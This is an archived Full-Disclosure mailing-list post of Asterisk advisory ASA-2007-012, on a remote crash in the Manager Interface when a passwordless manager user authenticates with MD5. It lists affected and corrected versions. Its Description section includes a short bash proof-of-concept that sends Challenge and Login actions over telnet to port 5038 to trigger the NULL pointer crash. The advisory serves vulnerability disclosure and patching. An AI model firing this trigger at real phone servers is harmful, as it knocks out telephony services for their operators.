Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] ASA-2007-012: Remote Crash Vulnerability in Manager In

from [Asterisk Development Team] Network Security [Permanent Link]
Subject: [Full-disclosure] ASA-2007-012: Remote Crash Vulnerability in Manager Interface
Date: Tue, 24 Apr 2007 18:24:32 -0500 
               Asterisk Project Security Advisory - ASA-2007-012

   +------------------------------------------------------------------------+
   |       Product       | Asterisk                                         |
   |---------------------+--------------------------------------------------|
   |       Summary       | Remote Crash Vulnerability in Manager Interface  |
   |---------------------+--------------------------------------------------|
   | Nature of Advisory  | Denial of Service                                |
   |---------------------+--------------------------------------------------|
   |   Susceptibility    | Remote Unauthenticated Sessions                  |
   |---------------------+--------------------------------------------------|
   |      Severity       | Moderate                                         |
   |---------------------+--------------------------------------------------|
   |   Exploits Known    | Yes                                              |
   |---------------------+--------------------------------------------------|
   |     Reported On     | April 24, 2007                                   |
   |---------------------+--------------------------------------------------|
   |     Reported By     | Digium Technical Support                         |
   |---------------------+--------------------------------------------------|
   |      Posted On      | April 24, 2007                                   |
   |---------------------+--------------------------------------------------|
   |   Last Updated On   | April 24, 2007                                   |
   |---------------------+--------------------------------------------------|
   |  Advisory Contact   | russell@digium.com                               |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Description | The Asterisk Manager Interface has a remote crash        |
   |             | vulnerability. If a manager user is configured in        |
   |             | manager.conf without a password, and then a connection   |
   |             | is made that attempts to use that username and MD5       |
   |             | authentication, Asterisk will dereference a NULL pointer |
   |             | and crash.                                               |
   |             |                                                          |
   |             | This example script shows how the crash can be           |
   |             | triggered:                                               |
   |             |                                                          |
   |             | #!/bin/bash                                              |
   |             |                                                          |
   |             | function text1() {                                       |
   |             |                                                          |
   |             | cat <<- EOF                                              |
   |             |                                                          |
   |             | action: Challenge                                        |
   |             |                                                          |
   |             | actionid: 0#                                             |
   |             |                                                          |
   |             | authtype: MD5                                            |
   |             |                                                          |
   |             | EOF                                                      |
   |             |                                                          |
   |             | }                                                        |
   |             |                                                          |
   |             | function text2() {                                       |
   |             |                                                          |
   |             | cat <<- EOF                                              |
   |             |                                                          |
   |             | action: Login                                            |
   |             |                                                          |
   |             | actionid: 1#                                             |
   |             |                                                          |
   |             | key: textstringhere                                      |
   |             |                                                          |
   |             | username: testuser                                       |
   |             |                                                          |
   |             | authtype: MD5                                            |
   |             |                                                          |
   |             | EOF                                                      |
   |             |                                                          |
   |             | }                                                        |
   |             |                                                          |
   |             | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1     |
   |             | 5038                                                     |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Resolution | The manager interface is not enabled by default. If it is |
   |            | enabled, the only way this crash can be exploited is if a |
   |            | user exists in manager.conf without a password. Given the |
   |            | conditions necessary for this problem to be exploited,    |
   |            | the severity of this issue is marked as 'moderate'.       |
   |            |                                                           |
   |            | All users of the Asterisk manager interface in affected   |
   |            | versions should ensure that there are no accounts in      |
   |            | manager.conf. Alternatively, the issue can be avoided by  |
   |            | completely disabling the manager interface.               |
   |            |                                                           |
   |            | Users of the manager interface are encouraged to update   |
   |            | to the appropriate version of their Asterisk product      |
   |            | listed in the 'Corrected In' section below.               |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                           Affected Versions                            |
   |------------------------------------------------------------------------|
   |           Product            |   Release   |                           |
   |                              |   Series    |                           |
   |------------------------------+-------------+---------------------------|
   |     Asterisk Open Source     |    1.0.x    | All versions              |
   |------------------------------+-------------+---------------------------|
   |     Asterisk Open Source     |    1.2.x    | All versions prior to     |
   |                              |             | 1.2.18                    |
   |------------------------------+-------------+---------------------------|
   |     Asterisk Open Source     |    1.4.x    | All versions prior to     |
   |                              |             | 1.4.3                     |
   |------------------------------+-------------+---------------------------|
   |  Asterisk Business Edition   |    A.x.x    | All versions              |
   |------------------------------+-------------+---------------------------|
   |  Asterisk Business Edition   |    B.x.x    | All versions up to and    |
   |                              |             | including B.1.3           |
   |------------------------------+-------------+---------------------------|
   |         AsteriskNOW          | pre-release | All version up to and     |
   |                              |             | including Beta5           |
   |------------------------------+-------------+---------------------------|
   | Asterisk Appliance Developer |    0.x.x    | All versions prior to     |
   |             Kit              |             | 0.4.0                     |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                              Corrected In                              |
   |------------------------------------------------------------------------|
   |      Product      |                      Release                       |
   |-------------------+----------------------------------------------------|
   |   Asterisk Open   |          1.2.18 and 1.4.3, available from          |
   |      Source       |    ftp://ftp.digium.com/pub/telephony/asterisk     |
   |-------------------+----------------------------------------------------|
   | Asterisk Business |   B.1.3.3, available from the Asterisk Business    |
   |      Edition      |  Edition user portal on http://www.digium.com or   |
   |                   |            via Digium Technical Support            |
   |-------------------+----------------------------------------------------|
   |    AsteriskNOW    |             Beta6, when available from             |
   |                   |   http://www.asterisknow.org/. Beta5 can use the   |
   |                   |   system update feature in the appliance control   |
   |                   |                       panel.                       |
   |-------------------+----------------------------------------------------|
   |     Asterisk      |               0.4.0, available from                |
   |     Appliance     |      ftp://ftp.digium.com/pub/telephony/aadk/      |
   |   Developer Kit   |                                                    |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |        Links        |                                                  |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Asterisk Project Security Advisories are posted at                     |
   | http://www.asterisk.org/security.                                      |
   |                                                                        |
   | This document may be superseded by later versions; if so, the latest   |
   | version will be posted at                                              |
   | http://www.asterisk.org/files/ASA-2007-012.pdf.                        |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - ASA-2007-012
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] ASA-2007-012: Remote Crash Vulnerability in Manager Interface, Asterisk Development Team <=
Previous by Date:  [Full-disclosure] ASA-2007-011: Multiple problems in SIP channel parser handling response codes, Asterisk Development Team
Next by Date:  [Full-disclosure] ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code, Asterisk Development Team
Previous by Thread:  [Full-disclosure] ASA-2007-011: Multiple problems in SIP channel parser handling response codes, Asterisk Development Team
Next by Thread:  [Full-disclosure] ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code, Asterisk Development Team
Indexes:  [Date] [Thread] [Top] [All Lists]